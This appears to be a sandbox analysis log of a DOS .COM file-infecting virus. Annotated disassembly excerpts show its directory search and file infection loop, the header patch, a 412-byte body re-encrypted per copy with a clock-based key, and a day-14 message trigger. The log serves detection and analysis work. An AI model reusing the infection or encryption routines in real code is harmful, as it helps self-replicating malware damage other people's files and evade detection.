2018-12-25T11:49:14.151245074Z 42 PC: 12bae | Get date 0x12bae: cmp dl, 0xe  ; day of month == 14?
0x12bb1: jne 0x12bbf  ; any other day: return without output
0x12bb3: call 0x12bb6  ; call/pop to obtain the run-time address
0x12bb6: pop dx
0x12bb7: add dx, 0xa  ; DX -> 0x12bc0, the dollar-terminated string
0x12bbb: mov ah, 9  ; AH=09h: print string at DS:DX
0x12bbd: int 0x21
0x12bbf: ret
; From 0x12bc0 on the bytes are the message data DX points to, decoded as if
; they were instructions; they are not code. The two-byte spans at 0x12bc2 and
; 0x12bc7 for one-byte opcodes fit a prefix byte folded into the mnemonic.
; Re-encoding the mnemonics gives printable ASCII, most likely "[C6H12O6] " up
; to the $ terminator at 0x12bca, then a zero byte and text that begins
; "Blood Su" - verify against a hex dump of the sample.
0x12bc0: pop bx
0x12bc1: inc bx
0x12bc2: dec ax
0x12bc4: xor word ptr [bp + si], si
0x12bc6: dec di
0x12bc7: pop bp
0x12bc9: and byte ptr [si], ah
0x12bcb: add byte ptr [bp + si + 0x6c], al
0x12bce: outsw dx, word ptr [si]
0x12bcf: outsw dx, word ptr [si]
0x12bd0: and byte ptr fs:[bp + di + 0x75], dl
0x12bd4: popaw
2018-12-25T11:49:14.154462554Z 76 PC: 12a44 | Terminate with return code (Return code = '2')

{"DateBased":true,"Day":3,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3442,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Linear disassembly of the bytes that follow the return address of the logged
; "Get date" call (op 42 = INT 21h/AH=2Ah). It lists what sits in memory after
; that address, not only the path that executed. In this run the log records
; op 59 (Change current directory) at PC 12a8d right after this listing, so
; the AL == 4 branch was taken before the file search started.
2018-12-25T11:49:13.799754249Z 42 PC: 12a7d | Get date 0x12a7d: cmp al, 4  ; AL = day of week from Get date (0 = Sunday), so 4 = Thursday
0x12a7f: jne 0x12a8d  ; any other weekday: skip the directory change
0x12a81: call 0x12a84  ; call to the next instruction: pushes its own address (position-independent addressing)
0x12a84: pop dx  ; DX = offset of 0x12a84 as loaded at run time
0x12a85: add dx, 0x3b  ; DX -> 0x12abf, the path argument (data bytes are not shown in this trace)
0x12a89: mov ah, 0x3b  ; AH=3Bh: change current directory
0x12a8b: int 0x21
0x12a8d: mov ah, 0x4e  ; AH=4Eh: find first matching file
0x12a8f: xor cx, cx  ; attribute mask 0: no hidden/system/directory entries
0x12a91: call 0x12a94  ; same call/pop idiom
0x12a94: pop dx
0x12a95: add dx, 0x25  ; DX -> 0x12ab9, the search mask (data bytes are not shown in this trace)
0x12a99: int 0x21
0x12a9b: jb 0x12aa3  ; carry set = nothing matched: take the exit path
0x12a9d: call 0x12ac2  ; per-file routine; the open/read/seek/write records that follow carry PCs inside it
0x12aa0: jmp 0x12aa6
0x12aa3: jmp 0x12b88  ; exit path once find first/next reports no more files
0x12aa6: mov ah, 0x4f  ; AH=4Fh: find next matching file
0x12aa8: int 0x21
0x12aaa: jb 0x12aa3  ; no more matches: exit path
2018-12-25T11:49:13.803061266Z 59 PC: 12a8d | Change current directory
2018-12-25T11:49:13.80768092Z 78 PC: 12a9b | Find first file
2018-12-25T11:49:13.813799374Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:49:13.825889034Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:49:13.832854655Z 66 PC: 12b0b | Move file pointer
2018-12-25T11:49:13.834534596Z 64 PC: 12b19 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:49:13.837400561Z 66 PC: 12b22 | Move file pointer
2018-12-25T11:49:13.840262302Z 64 PC: 12b30 | Write file or device (Write 4 bytes on handle 5)
; Linear disassembly after the logged "Get time" call (op 44 = INT 21h/AH=2Ch,
; which returns DH = seconds). The code prepares the 0x19c (412) byte buffer
; that the next log record writes to the open file: the first 0x26 bytes are
; copied unchanged, the remaining 0x176 bytes are transformed with a rolling
; additive key. Key and step are re-derived for every file, so only the
; unchanged 0x26-byte prefix can be expected to repeat across written copies.
; SI, DI and BX are set up before this excerpt and are not shown.
2018-12-25T11:49:13.843159106Z 44 PC: 12b45 | Get time 0x12b45: mov ah, dh  ; AH = seconds field of the time just read
0x12b47: add ah, byte ptr [bx]  ; mix in the byte kept at [BX]
0x12b49: mov byte ptr [bx], ah  ; store back: [BX] now holds the start key for this copy
0x12b4b: mov dl, byte ptr [0x9a]  ; NOTE(review): DS:0x9a would be the file-size low byte if the DTA is still at PSP:80h (80h + 1Ah) - confirm
0x12b4f: add dl, byte ptr [bx + 1]
0x12b52: or dl, 1  ; force the step odd, so it is never zero
0x12b55: mov byte ptr [bx + 1], dl  ; [BX+1] holds the key step for this copy
0x12b58: mov cx, 0x26
0x12b5b: rep movsb byte ptr es:[di], byte ptr [si]  ; first 0x26 (38) bytes copied as-is
0x12b5d: mov cx, 0x19c
0x12b60: sub cx, 0x26  ; CX = 0x176 (374) bytes still to process
0x12b63: lodsb al, byte ptr [si]
0x12b64: add al, ah  ; output byte = input byte + current key
0x12b66: add ah, dl  ; key advances by the step after every byte
0x12b68: stosb byte ptr es:[di], al
0x12b69: loop 0x12b63
0x12b6b: pop bx
0x12b6c: mov dx, 0xfaa0  ; DS:DX = buffer handed to the write call
0x12b6f: mov cx, 0x19c  ; 412 bytes, matching the Write record that follows
0x12b72: mov ah, 0x40  ; AH=40h: write to file handle
2018-12-25T11:49:13.845637903Z 64 PC: 12b76 | Write file or device (Write 412 bytes on handle 5)
2018-12-25T11:49:14.279115706Z 87 PC: 12b83 | Get or set file date and time
2018-12-25T11:49:14.280987603Z 62 PC: 12b87 | Close file
2018-12-25T11:49:14.288709367Z 79 PC: 12aaa | Find next file
2018-12-25T11:49:14.292788878Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.29999381Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.306594894Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.309005732Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.311618514Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.312980945Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.316597399Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.31910914Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.322756524Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.325391694Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.332922199Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.335531655Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.343692905Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.351275298Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.352983258Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.35677496Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.365238655Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.368185728Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.370889674Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.375864057Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.377641872Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.385352819Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.388789972Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.396841985Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.40383098Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.409077457Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.41200971Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.413693853Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.41988873Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.422026716Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.424572387Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.427487427Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.43470846Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.437500361Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.446983923Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.453821844Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.455187745Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.458770806Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.460163686Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.462711288Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.465493218Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.468382836Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.469841476Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.479248533Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.481866965Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.486787524Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.494366435Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.49605001Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.49882385Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.500854412Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.503715454Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.50586796Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.514924188Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.517061338Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.52480861Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.527619645Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.542119833Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.548687248Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.550326002Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.554249674Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.555894381Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.558761329Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.562225554Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.565092301Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.56682802Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.575391736Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.578609325Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.585303454Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.592607936Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.594696072Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.599104983Z 79 PC: 12aaa | Find next file (See above)
; Linear disassembly after the second logged "Get date" call (INT 21h/AH=2Ah
; returns DL = day of month). Date-triggered message: printed only on day 14.
2018-12-25T11:49:14.601265217Z 42 PC: 12bae | Get date 0x12bae: cmp dl, 0xe  ; day of month == 14?
0x12bb1: jne 0x12bbf  ; any other day: return without output
0x12bb3: call 0x12bb6  ; call/pop to obtain the run-time address
0x12bb6: pop dx
0x12bb7: add dx, 0xa  ; DX -> 0x12bc0, the dollar-terminated string
0x12bbb: mov ah, 9  ; AH=09h: print string at DS:DX
0x12bbd: int 0x21
0x12bbf: ret
; From 0x12bc0 on the bytes are the message data DX points to, decoded as if
; they were instructions; they are not code. The two-byte spans at 0x12bc2 and
; 0x12bc7 for one-byte opcodes fit a prefix byte folded into the mnemonic.
; Re-encoding the mnemonics gives printable ASCII, most likely "[C6H12O6] " up
; to the $ terminator at 0x12bca, then a zero byte and text that begins
; "Blood Su" - verify against a hex dump of the sample.
0x12bc0: pop bx
0x12bc1: inc bx
0x12bc2: dec ax
0x12bc4: xor word ptr [bp + si], si
0x12bc6: dec di
0x12bc7: pop bp
0x12bc9: and byte ptr [si], ah
0x12bcb: add byte ptr [bp + si + 0x6c], al
0x12bce: outsw dx, word ptr [si]
0x12bcf: outsw dx, word ptr [si]
0x12bd0: and byte ptr fs:[bp + di + 0x75], dl
0x12bd4: popaw
2018-12-25T11:49:14.60307851Z 76 PC: 12a44 | Terminate with return code (Return code = '4')

{"DateBased":true,"Day":14,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3442,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Linear disassembly of the bytes that follow the return address of the logged
; "Get date" call (op 42 = INT 21h/AH=2Ah). It lists what sits in memory after
; that address, not only the path that executed. The next record in this run
; is "Find first file", with no "Change current directory" before it, so the
; AL == 4 branch was not taken here.
2018-12-25T13:06:51.49324165Z 42 PC: 12a7d | Get date 0x12a7d: cmp al, 4  ; AL = day of week from Get date (0 = Sunday), so 4 = Thursday
0x12a7f: jne 0x12a8d  ; any other weekday: skip the directory change
0x12a81: call 0x12a84  ; call to the next instruction: pushes its own address (position-independent addressing)
0x12a84: pop dx  ; DX = offset of 0x12a84 as loaded at run time
0x12a85: add dx, 0x3b  ; DX -> 0x12abf, the path argument (data bytes are not shown in this trace)
0x12a89: mov ah, 0x3b  ; AH=3Bh: change current directory
0x12a8b: int 0x21
0x12a8d: mov ah, 0x4e  ; AH=4Eh: find first matching file
0x12a8f: xor cx, cx  ; attribute mask 0: no hidden/system/directory entries
0x12a91: call 0x12a94  ; same call/pop idiom
0x12a94: pop dx
0x12a95: add dx, 0x25  ; DX -> 0x12ab9, the search mask (data bytes are not shown in this trace)
0x12a99: int 0x21
0x12a9b: jb 0x12aa3  ; carry set = nothing matched: take the exit path
0x12a9d: call 0x12ac2  ; per-file routine; the open/read/seek/write records that follow carry PCs inside it
0x12aa0: jmp 0x12aa6
0x12aa3: jmp 0x12b88  ; exit path once find first/next reports no more files
0x12aa6: mov ah, 0x4f  ; AH=4Fh: find next matching file
0x12aa8: int 0x21
0x12aaa: jb 0x12aa3  ; no more matches: exit path
2018-12-25T13:06:51.496331262Z 78 PC: 12a9b | Find first file
2018-12-25T13:06:51.503307932Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-25T13:06:51.511587929Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-25T13:06:51.521975089Z 66 PC: 12b0b | Move file pointer
2018-12-25T13:06:51.535658516Z 64 PC: 12b19 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T13:06:51.540120828Z 66 PC: 12b22 | Move file pointer
2018-12-25T13:06:51.542094469Z 64 PC: 12b30 | Write file or device (Write 4 bytes on handle 5)
; Linear disassembly after the logged "Get time" call (op 44 = INT 21h/AH=2Ch,
; which returns DH = seconds). The code prepares the 0x19c (412) byte buffer
; that the next log record writes to the open file: the first 0x26 bytes are
; copied unchanged, the remaining 0x176 bytes are transformed with a rolling
; additive key. Key and step are re-derived for every file, so only the
; unchanged 0x26-byte prefix can be expected to repeat across written copies.
; SI, DI and BX are set up before this excerpt and are not shown.
2018-12-25T13:06:51.547566153Z 44 PC: 12b45 | Get time 0x12b45: mov ah, dh  ; AH = seconds field of the time just read
0x12b47: add ah, byte ptr [bx]  ; mix in the byte kept at [BX]
0x12b49: mov byte ptr [bx], ah  ; store back: [BX] now holds the start key for this copy
0x12b4b: mov dl, byte ptr [0x9a]  ; NOTE(review): DS:0x9a would be the file-size low byte if the DTA is still at PSP:80h (80h + 1Ah) - confirm
0x12b4f: add dl, byte ptr [bx + 1]
0x12b52: or dl, 1  ; force the step odd, so it is never zero
0x12b55: mov byte ptr [bx + 1], dl  ; [BX+1] holds the key step for this copy
0x12b58: mov cx, 0x26
0x12b5b: rep movsb byte ptr es:[di], byte ptr [si]  ; first 0x26 (38) bytes copied as-is
0x12b5d: mov cx, 0x19c
0x12b60: sub cx, 0x26  ; CX = 0x176 (374) bytes still to process
0x12b63: lodsb al, byte ptr [si]
0x12b64: add al, ah  ; output byte = input byte + current key
0x12b66: add ah, dl  ; key advances by the step after every byte
0x12b68: stosb byte ptr es:[di], al
0x12b69: loop 0x12b63
0x12b6b: pop bx
0x12b6c: mov dx, 0xfaa0  ; DS:DX = buffer handed to the write call
0x12b6f: mov cx, 0x19c  ; 412 bytes, matching the Write record that follows
0x12b72: mov ah, 0x40  ; AH=40h: write to file handle
2018-12-25T13:06:51.550463322Z 64 PC: 12b76 | Write file or device (Write 412 bytes on handle 5)
2018-12-25T13:06:51.566594541Z 87 PC: 12b83 | Get or set file date and time
2018-12-25T13:06:51.569249786Z 62 PC: 12b87 | Close file
2018-12-25T13:06:51.57806048Z 79 PC: 12aaa | Find next file
2018-12-25T13:06:51.589348434Z 61 PC: 12aca | Open file (See above)
2018-12-25T13:06:51.59816561Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T13:06:51.606418485Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T13:06:51.608440015Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T13:06:51.6121493Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T13:06:51.620139841Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T13:06:51.624297575Z 44 PC: 12b45 | Get time (See above)
2018-12-25T13:06:51.627470428Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T13:06:51.630797813Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T13:06:51.632419635Z 62 PC: 12b87 | Close file (See above)
2018-12-25T13:06:51.641044655Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T13:06:51.648822762Z 61 PC: 12aca | Open file (See above)
2018-12-25T13:06:51.656932226Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T13:06:51.664683973Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T13:06:51.667834011Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T13:06:51.671107239Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T13:06:51.672979479Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T13:06:51.677187715Z 44 PC: 12b45 | Get time (See above)
2018-12-25T13:06:51.68040834Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T13:06:51.683693424Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T13:06:51.686445114Z 62 PC: 12b87 | Close file (See above)
2018-12-25T13:06:51.697308615Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T13:06:51.70061535Z 61 PC: 12aca | Open file (See above)
2018-12-25T13:06:51.708460263Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T13:06:51.717230462Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T13:06:51.719113725Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T13:06:51.722374355Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T13:06:51.725369586Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T13:06:51.728654356Z 44 PC: 12b45 | Get time (See above)
2018-12-25T13:06:51.731496902Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T13:06:51.735767674Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T13:06:51.738145901Z 62 PC: 12b87 | Close file (See above)
2018-12-25T13:06:51.746622137Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T13:06:51.750788239Z 61 PC: 12aca | Open file (See above)
2018-12-25T13:06:51.760186019Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T13:06:51.767673485Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T13:06:51.77003887Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T13:06:51.773884298Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T13:06:51.775922277Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T13:06:51.779367603Z 44 PC: 12b45 | Get time (See above)
2018-12-25T13:06:51.783477052Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T13:06:51.786912192Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T13:06:51.789031438Z 62 PC: 12b87 | Close file (See above)
2018-12-25T13:06:51.798461491Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T13:06:51.802275832Z 61 PC: 12aca | Open file (See above)
2018-12-25T13:06:51.810088694Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T13:06:51.818597635Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T13:06:51.821030011Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T13:06:51.824395075Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T13:06:51.826583104Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T13:06:51.83086254Z 44 PC: 12b45 | Get time (See above)
2018-12-25T13:06:51.83445716Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T13:06:51.843484056Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T13:06:51.84620406Z 62 PC: 12b87 | Close file (See above)
2018-12-25T13:06:51.85538747Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T13:06:51.858734819Z 61 PC: 12aca | Open file (See above)
2018-12-25T13:06:51.867664392Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T13:06:51.875550434Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T13:06:51.8778939Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T13:06:51.882358021Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T13:06:51.884994396Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T13:06:51.888444839Z 44 PC: 12b45 | Get time (See above)
2018-12-25T13:06:51.892079674Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T13:06:51.895844808Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T13:06:51.897947656Z 62 PC: 12b87 | Close file (See above)
2018-12-25T13:06:51.907889105Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T13:06:51.911177099Z 61 PC: 12aca | Open file (See above)
2018-12-25T13:06:51.918269504Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T13:06:51.921393477Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T13:06:51.924391187Z 62 PC: 12b87 | Close file (See above)
2018-12-25T13:06:51.932521807Z 79 PC: 12aaa | Find next file (See above)
; Date-triggered message routine (sandbox disassembly excerpt, 16-bit, Intel syntax).
; It starts at the return from the "Get date" call logged on the next line.
2018-12-25T13:06:51.935888021Z 42 PC: 12bae | Get date 0x12bae: cmp dl, 0xe  ; DL = day of month from Get date (INT 21h AH=2Ah); 0x0e = 14
0x12bb1: jne 0x12bbf  ; any other day: go straight to ret, nothing is printed
0x12bb3: call 0x12bb6  ; call to the next instruction pushes that instruction's own address
0x12bb6: pop dx  ; DX = run-time offset of 0x12bb6 (self-locating, no fixed load address needed)
0x12bb7: add dx, 0xa  ; DX -> 0x12bc0, the bytes immediately after ret
0x12bbb: mov ah, 9  ; INT 21h AH=09h: print the '$'-terminated string at DS:DX
0x12bbd: int 0x21
0x12bbf: ret
; NOTE(review): everything from 0x12bc0 on is string data that the disassembler decoded as
; instructions after running past ret. Byte values below are reconstructed from the instruction
; encodings; they spell "[C6H12O6] $", which matches the "Display string" entry logged after
; this excerpt, so this run took the day-14 branch.
0x12bc0: pop bx  ; 5B = '['
0x12bc1: inc bx  ; 43 = 'C'
0x12bc2: dec ax  ; 36 48 = "6H" (0x36 was decoded as an SS: prefix)
0x12bc4: xor word ptr [bp + si], si  ; 31 32 = "12"
0x12bc6: dec di  ; 4F = 'O'
0x12bc7: pop bp  ; 36 5D = "6]"
0x12bc9: and byte ptr [si], ah  ; 20 24 = " $"; '$' terminates the AH=09h string
0x12bcb: add byte ptr [bp + si + 0x6c], al  ; 00 42 6C = NUL, "Bl": a second string appears to start here
0x12bce: outsw dx, word ptr [si]  ; 6F = 'o'
0x12bcf: outsw dx, word ptr [si]  ; 6F = 'o'
0x12bd0: and byte ptr fs:[bp + di + 0x75], dl  ; 64 20 53 75 = "d Su"
0x12bd4: popaw  ; last decoded item; its length is not visible, so text past "Blood Su" cannot be read from this listing
2018-12-25T13:06:51.940082424Z 9 PC: 12bbf | Display string (String= '[C6H12O6] ')
2018-12-25T13:06:51.942899746Z 76 PC: 12a44 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3442,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Directory scan loop (sandbox disassembly excerpt, 16-bit, Intel syntax).
; It starts at the return from the "Get date" call logged on the next line. Each later
; "Find next file" entry in the trace is one more pass through this loop.
2018-12-25T11:49:13.771934095Z 42 PC: 12a7d | Get date 0x12a7d: cmp al, 4  ; AL = day of week from Get date (INT 21h AH=2Ah, 0 = Sunday); 4 = Thursday
0x12a7f: jne 0x12a8d  ; other weekdays skip the directory change; this run logs "Find first file" next, so it was skipped here
0x12a81: call 0x12a84  ; call/pop pair: the code finds its own run-time address
0x12a84: pop dx  ; DX = run-time offset of 0x12a84
0x12a85: add dx, 0x3b  ; DX -> 0x12abf, a path string that is not shown in this trace
0x12a89: mov ah, 0x3b  ; INT 21h AH=3Bh: change current directory to DS:DX
0x12a8b: int 0x21
0x12a8d: mov ah, 0x4e  ; INT 21h AH=4Eh: find first matching file
0x12a8f: xor cx, cx  ; CX = 0: attribute mask for the search (normal files)
0x12a91: call 0x12a94  ; same self-locating idiom as above
0x12a94: pop dx
0x12a95: add dx, 0x25  ; DX -> 0x12ab9, the search pattern (not shown; the trace opens SLEEP.COM, so presumably a .COM mask)
0x12a99: int 0x21
0x12a9b: jb 0x12aa3  ; CF set = no match or error: leave via the stub at 0x12aa3
0x12a9d: call 0x12ac2  ; per-file routine; the Open/Read/Write/Close entries in the trace come from inside it
0x12aa0: jmp 0x12aa6
0x12aa3: jmp 0x12b88  ; exit stub; its target lies outside this excerpt
0x12aa6: mov ah, 0x4f  ; INT 21h AH=4Fh: find next matching file
0x12aa8: int 0x21
0x12aaa: jb 0x12aa3  ; CF set = no more files; the fall-through path is not part of this excerpt
2018-12-25T11:49:13.774557476Z 78 PC: 12a9b | Find first file
2018-12-25T11:49:13.780515252Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:49:13.785900461Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:49:13.79274158Z 66 PC: 12b0b | Move file pointer
2018-12-25T11:49:13.794127676Z 64 PC: 12b19 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:49:13.796531886Z 66 PC: 12b22 | Move file pointer
2018-12-25T11:49:13.802265039Z 64 PC: 12b30 | Write file or device (Write 4 bytes on handle 5)
; Re-encoding of the 412-byte body before it is written to the opened file
; (sandbox disassembly excerpt, 16-bit, Intel syntax). It starts at the return from "Get time".
; For detection: the first 0x26 bytes are copied unchanged while the other 374 depend on the
; clock, so a byte signature can only anchor on the leading region (NOTE(review): the two bytes
; patched through [bx] may sit inside it; confirm) or on the logged behaviour instead.
2018-12-25T11:49:13.805383219Z 44 PC: 12b45 | Get time 0x12b45: mov ah, dh  ; DH = seconds from Get time (INT 21h AH=2Ch)
0x12b47: add ah, byte ptr [bx]  ; mix with the byte already stored at [bx] (where BX points is set before this excerpt)
0x12b49: mov byte ptr [bx], ah  ; store back; AH is the starting key for the loop below
0x12b4b: mov dl, byte ptr [0x9a]  ; NOTE(review): 0x9A = 0x80 + 0x1A, the file-size low byte if the default DTA is in use; confirm
0x12b4f: add dl, byte ptr [bx + 1]
0x12b52: or dl, 1  ; force the value odd, so it is never zero
0x12b55: mov byte ptr [bx + 1], dl  ; store back; DL is the per-byte key increment
0x12b58: mov cx, 0x26  ; 0x26 = 38 bytes
0x12b5b: rep movsb byte ptr es:[di], byte ptr [si]  ; first 38 bytes copied unchanged, DS:SI -> ES:DI (both set before this excerpt)
0x12b5d: mov cx, 0x19c
0x12b60: sub cx, 0x26  ; 412 - 38 = 374 bytes left to transform
0x12b63: lodsb al, byte ptr [si]
0x12b64: add al, ah  ; byte += key
0x12b66: add ah, dl  ; key += increment, so every byte gets a different key
0x12b68: stosb byte ptr es:[di], al
0x12b69: loop 0x12b63
0x12b6b: pop bx  ; BX restored from the stack; AH=40h takes the file handle in BX
0x12b6c: mov dx, 0xfaa0  ; DS:DX = buffer to write
0x12b6f: mov cx, 0x19c  ; 0x19c = 412, matching "Write 412 bytes" in the trace
0x12b72: mov ah, 0x40  ; INT 21h AH=40h: write to file; the int itself is past the end of this excerpt
2018-12-25T11:49:13.807856478Z 64 PC: 12b76 | Write file or device (Write 412 bytes on handle 5)
2018-12-25T11:49:14.277292431Z 87 PC: 12b83 | Get or set file date and time
2018-12-25T11:49:14.27994529Z 62 PC: 12b87 | Close file
2018-12-25T11:49:14.287340807Z 79 PC: 12aaa | Find next file
2018-12-25T11:49:14.290596023Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.29914325Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.306741662Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.313537089Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.317755279Z 66 PC: 12b22 | Move file pointer (See above)
